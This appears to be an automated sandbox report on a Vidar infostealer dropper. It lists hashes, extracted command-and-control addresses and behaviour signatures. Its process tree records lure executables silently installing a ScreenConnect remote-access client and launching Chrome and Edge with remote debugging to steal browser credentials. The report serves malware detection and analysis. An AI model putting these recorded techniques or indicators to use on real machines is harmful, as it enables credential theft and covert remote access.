Overview

overview

10

Static

static

3

4363463463...63.exe

windows11-21h2-x64

10

New Text D...od.exe

windows11-21h2-x64

10

Resubmissions

14-02-2025 01:10

250214-bjsnnayne1 10

14-02-2025 01:00

250214-bc5pmsymhw 10

13-02-2025 05:01

250213-fnkwtstpgw 10

13-02-2025 04:24

250213-e1kk6atmaz 10

13-02-2025 04:08

250213-eqe8patkgx 8

12-02-2025 23:56

250212-3yzt3azrdx 10

12-02-2025 23:44

250212-3rgd5szmbm 10

12-02-2025 23:19

250212-3a9dlazkep 10

12-02-2025 13:32

250212-qs211ssrfr 10

Analysis

  • max time kernel
    1800s
  • max time network
    1801s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250210-en
  • resource tags

    arch:x64arch:x86image:win11-20250210-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    14-02-2025 01:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Score
10/10
vidaradwarecredential_accessdiscoverypersistenceprivilege_escalationspywarestealer

Malware Config

Extracted

Family

vidar

C2

https://t.me/b4cha00

https://steamcommunity.com/profiles/76561199825403037
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0

Signatures

  • Detect Vidar Stealer 3 IoCs
    stealer
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

    persistence
  • Downloads MZ/PE file 11 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

    persistenceprivilege_escalation
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Installs/modifies Browser Helper Object 2 TTPs 8 IoCs

    BHOs are DLL modules which act as plugins for Internet Explorer.

    stealeradware
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 4 IoCs

    Suspicious Windows Authentication Registry Modification.

    persistenceprivilege_escalation
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 53 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 8 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 24 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 62 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs
    defense_evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware

Processes

  • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
    1⤵
    • Downloads MZ/PE file
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4900
    • C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
      "C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1144
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        PID:952
    • C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe
      "C:\Users\Admin\AppData\Local\Temp\a\USDTFlash.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3136
      • C:\Windows\SysWOW64\msiexec.exe
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
        3⤵
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        PID:2276
  • C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
    "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzU4MjhDNUUtMDUxOS00MTE5LUFDMzItMEQwMjhCMDJCMjUwfSIgdXNlcmlkPSJ7N0I0QUNERUYtMzE3My00REU0LTg5MDUtNERGQTAyQjNBNDUwfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RERBRUExMjItNkZCQi00QzhDLTgxMkYtMzNFRDkzMkRGNzJEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjMiIGluc3RhbGxkYXRldGltZT0iMTczOTE4Mzk2NiIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNjU1NjQwMTY2MDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUwNDc2OTcwNjEiLz48L2FwcD48L3JlcXVlc3Q-
    1⤵
    • System Location Discovery: System Language Discovery
    • System Network Configuration Discovery: Internet Connection Discovery
    PID:3740
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /0
    1⤵
    • Checks SCSI registry key(s)
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:4788
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3580
    • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
      "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
      1⤵
      • Downloads MZ/PE file
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:720
      • C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
        "C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1208
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
          3⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:652
      • C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
        "C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2896
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
          3⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          PID:872
      • C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe
        "C:\Users\Admin\AppData\Local\Temp\a\pothjasefdj.exe"
        2⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        PID:2356
        • C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
          3⤵
          • Uses browser remote debugging
          • Drops file in Windows directory
          • Enumerates system info in registry
          • Modifies data under HKEY_USERS
          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          PID:2160
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe81f8cc40,0x7ffe81f8cc4c,0x7ffe81f8cc58
            4⤵
              PID:1596
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1744,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=1732 /prefetch:2
              4⤵
                PID:4852
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2116,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2148 /prefetch:3
                4⤵
                  PID:4632
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=2404 /prefetch:8
                  4⤵
                    PID:2096
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3184 /prefetch:1
                    4⤵
                    • Uses browser remote debugging
                    PID:1964
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3332,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3316 /prefetch:1
                    4⤵
                    • Uses browser remote debugging
                    PID:3632
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4244,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4524 /prefetch:1
                    4⤵
                    • Uses browser remote debugging
                    PID:2884
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4660,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=3604 /prefetch:8
                    4⤵
                      PID:836
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4688,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4780 /prefetch:8
                      4⤵
                        PID:1780
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4916,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4932 /prefetch:8
                        4⤵
                          PID:4592
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5072,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4768 /prefetch:8
                          4⤵
                            PID:2528
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4832,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4896 /prefetch:8
                            4⤵
                              PID:252
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4496,i,15810430499633765755,4970291443279605454,262144 --variations-seed-version=20250209-180322.678000 --mojo-platform-channel-handle=4884 /prefetch:8
                              4⤵
                                PID:2080
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              3⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              PID:4676
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe81f93cb8,0x7ffe81f93cc8,0x7ffe81f93cd8
                                4⤵
                                  PID:736
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1896 /prefetch:2
                                  4⤵
                                    PID:3284
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2352 /prefetch:3
                                    4⤵
                                      PID:3704
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2552 /prefetch:8
                                      4⤵
                                        PID:2996
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                                        4⤵
                                        • Uses browser remote debugging
                                        PID:1592
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
                                        4⤵
                                        • Uses browser remote debugging
                                        PID:2744
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1972 /prefetch:2
                                        4⤵
                                          PID:1488
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2116 /prefetch:2
                                          4⤵
                                            PID:2828
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2032 /prefetch:2
                                            4⤵
                                              PID:1932
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4040 /prefetch:2
                                              4⤵
                                                PID:1536
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4024 /prefetch:2
                                                4⤵
                                                  PID:2696
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2164 /prefetch:1
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  PID:3388
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
                                                  4⤵
                                                  • Uses browser remote debugging
                                                  PID:3632
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1868,9896316070973506943,4492347659205062296,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3472 /prefetch:8
                                                  4⤵
                                                    PID:2988
                                              • C:\Users\Admin\AppData\Local\Temp\a\main.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3268
                                            • C:\Windows\system32\msiexec.exe
                                              C:\Windows\system32\msiexec.exe /V
                                              1⤵
                                              • Enumerates connected drives
                                              • Boot or Logon Autostart Execution: Authentication Package
                                              • Drops file in Program Files directory
                                              • Drops file in Windows directory
                                              • Modifies data under HKEY_USERS
                                              • Modifies registry class
                                              • Suspicious use of AdjustPrivilegeToken
                                              • Suspicious use of WriteProcessMemory
                                              PID:2020
                                              • C:\Windows\syswow64\MsiExec.exe
                                                C:\Windows\syswow64\MsiExec.exe -Embedding 744EA09B7BA7B5D76F054C87DCC8941F C
                                                2⤵
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                PID:2884
                                                • C:\Windows\SysWOW64\rundll32.exe
                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI85D9.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241272359 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                  3⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:252
                                              • C:\Windows\system32\srtasks.exe
                                                C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
                                                2⤵
                                                  PID:5116
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding DA876DEF3671D31DDC65F679980BD4AA
                                                  2⤵
                                                  • Loads dropped DLL
